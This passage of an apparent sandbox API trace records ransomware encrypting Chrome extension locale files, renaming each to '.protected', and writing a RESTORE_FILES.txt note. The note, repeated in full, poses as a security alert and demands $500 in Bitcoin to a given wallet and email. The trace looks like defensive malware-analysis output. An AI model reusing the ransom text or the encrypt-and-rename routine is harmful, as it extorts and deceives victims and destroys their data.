nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x165, lpOverlapped=0x0) returned 1 [0080.561] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffe9b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.561] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x165, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x165, lpOverlapped=0x0) returned 1 [0080.561] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.561] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.561] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.562] CloseHandle (hObject=0x168) returned 1 [0080.562] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json.protected") returned 165 [0080.562] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json.protected")) returned 1 [0080.562] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.562] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.562] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\RESTORE_FILES.txt") returned 159 [0080.562] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.563] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.563] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.563] lstrlenA (lpString="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") returned 684 [0080.563] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.563] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.563] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0080.563] CloseHandle (hObject=0x164) returned 1 [0080.563] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.564] lstrcmpiW (lpString1="km", lpString2="Windows") returned -1 [0080.564] lstrcmpiW (lpString1="km", lpString2="Program Files") returned -1 [0080.564] lstrcmpiW (lpString1="km", lpString2="Program Files (x86)") returned -1 [0080.564] lstrcmpiW (lpString1="km", lpString2="$Recycle.bin") returned 1 [0080.564] lstrcmpiW (lpString1="km", lpString2="System Volume Information") returned -1 [0080.564] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km") returned 141 [0080.564] lstrcmpW (lpString1="km", lpString2=".") returned 1 [0080.564] lstrcmpW (lpString1="km", lpString2="..") returned 1 [0080.564] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\*") returned 143 [0080.564] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.564] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.564] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.564] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.564] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.564] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.564] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\.") returned 143 [0080.564] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.564] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.564] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.564] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.564] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.564] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.564] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.564] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\..") returned 144 [0080.564] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.564] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.564] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.564] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.564] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.564] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.564] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.564] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.564] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json") 
returned 155 [0080.564] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.564] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.564] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.565] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.565] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.565] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json") returned 155 [0080.565] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.565] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json") returned 155 [0080.565] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.565] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json") returned 155 [0080.566] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.566] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x25f, lpOverlapped=0x0) returned 1 [0080.567] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffda1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.567] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x25f, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x25f, lpOverlapped=0x0) returned 1 [0080.567] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.567] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.567] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.567] CloseHandle (hObject=0x168) returned 1 [0080.567] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json.protected") returned 165 [0080.567] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json.protected")) returned 1 [0080.568] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.568] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.568] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\RESTORE_FILES.txt") returned 159 [0080.568] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.568] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.568] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.569] lstrlenA (lpString="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") returned 684 [0080.569] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.569] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.569] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0080.569] CloseHandle (hObject=0x164) returned 1 [0080.569] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.569] lstrcmpiW (lpString1="kn", lpString2="Windows") returned -1 [0080.569] lstrcmpiW (lpString1="kn", lpString2="Program Files") returned -1 [0080.569] lstrcmpiW (lpString1="kn", lpString2="Program Files (x86)") returned -1 [0080.569] lstrcmpiW (lpString1="kn", lpString2="$Recycle.bin") returned 1 [0080.569] lstrcmpiW (lpString1="kn", lpString2="System Volume Information") returned -1 [0080.569] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn") returned 141 [0080.569] lstrcmpW (lpString1="kn", lpString2=".") returned 1 [0080.569] lstrcmpW (lpString1="kn", lpString2="..") returned 1 [0080.569] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\*") returned 143 [0080.569] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.569] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.569] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.569] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.570] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.570] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.570] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\.") returned 143 [0080.570] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.570] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.570] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.570] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.570] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.570] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.570] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.570] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\..") returned 144 [0080.570] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.570] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.570] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.570] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.570] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.570] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.570] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.570] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.570] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json") 
returned 155 [0080.570] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.570] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.570] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.570] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.570] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.570] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json") returned 155 [0080.570] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.570] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json") returned 155 [0080.570] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.570] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json") returned 155 [0080.570] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.570] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x147, lpOverlapped=0x0) returned 1 [0080.571] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffeb9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.571] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x147, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x147, lpOverlapped=0x0) returned 1 [0080.571] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.571] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.572] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.572] CloseHandle (hObject=0x168) returned 1 [0080.572] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json.protected") returned 165 [0080.572] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
